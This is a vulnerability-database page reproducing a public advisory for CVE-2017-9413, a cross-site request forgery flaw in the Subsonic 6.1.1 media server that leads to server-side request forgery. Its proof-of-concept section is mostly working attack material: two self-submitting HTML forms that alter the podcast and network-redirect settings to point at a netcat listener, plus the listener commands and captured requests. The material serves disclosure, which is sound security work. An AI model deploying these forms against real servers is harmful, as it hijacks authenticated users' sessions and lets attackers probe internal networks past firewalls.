Vulners
Lucene search
Subsonic 6.1.1 - Server-Side Request Forgery Vulnerability
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Subsonic Server-Side Request Forgery Vulnerability | 7 Jun 201700:00 | – | cnvd |
 | CVE-2017-9413 | 25 Jul 201718:00 | – | cve |
 | CVE-2017-9413 | 25 Jul 201718:00 | – | cvelist |
 | Subsonic 6.1.1 - Server-Side Request Forgery | 5 Jun 201700:00 | – | exploitdb |
 | EUVD-2017-18348 | 7 Oct 202500:30 | – | euvd |
 | Subsonic 6.1.1 - Server-Side Request Forgery | 5 Jun 201700:00 | – | exploitpack |
 | CVE-2017-9413 | 25 Jul 201718:29 | – | nvd |
 | CVE-2017-9413 | 25 Jul 201718:29 | – | osv |
 | Subsonic 6.1.1 Server Side Request Forgery | 3 Jun 201700:00 | – | packetstorm |
 | Cross site request forgery (csrf) | 25 Jul 201718:29 | – | prion |
10
[+] Credits: John Page a.k.a hyp3rlinx
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
==================================
CSRF - Server Side Request Forgery
CVE Reference:
==============
CVE-2017-9413
Security Issue:
================
Remote attackers can abuse the Podcast feature of subsonic to launch Server Side Request Forgery attacks on the internal network
or to the internet if an authenticated user clicks a malicious link or visits an attacker controlled webpage. SSRF can be used to
bypass Firewall restriction on LAN.
e.g
nc.exe -llvp 1337
listening on [any] 1337 ...
connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
GET / HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_45
Host: 127.0.0.1:1337
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Exploit/POC:
=============
nc.exe -llvp 1337
listening on [any] 1337 ...
1) Subscribe to Podcast CSRF Persistent SSRF
<form method="post" action="http://localhost:4040/podcastReceiverAdmin.view?">
<input type="text" name="add" value="http://127.0.0.1:1337">
<input type="submit" value="OK">
<script>document.forms[0].submit()</script>
</form>
nc.exe -llvp 5555
listening on [any] 5555 ...
2) Interet Radio Settings CSRF Persistent SSRF
<form action="http://localhost:4040/networkSettings.view" method="post">
<input name="portForwardingEnabled" type="hidden" value="true"/>
<input type="hidden" name="_portForwardingEnabled" value="on"/>
<input name="urlRedirectionEnabled" type="hidden" value="true" />
<input type="hidden" name="_urlRedirectionEnabled" value="on"/>
<input name="urlRedirectType" type="radio" value="NORMAL"/>
<input name="urlRedirectFrom" type="radio" value="yourname"/>
<input name="urlRedirectType" type="radio" value="CUSTOM" checked="true" />
<input name="urlRedirectCustomUrl" type="hidden" value="http://127.0.0.1:5555"/>
<script>document.forms[0].submit()</script>
</form>
# 0day.today [2018-02-18] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jun 2017 00:00Current
8.7High risk
Vulners AI Score8.7
EPSS0.00217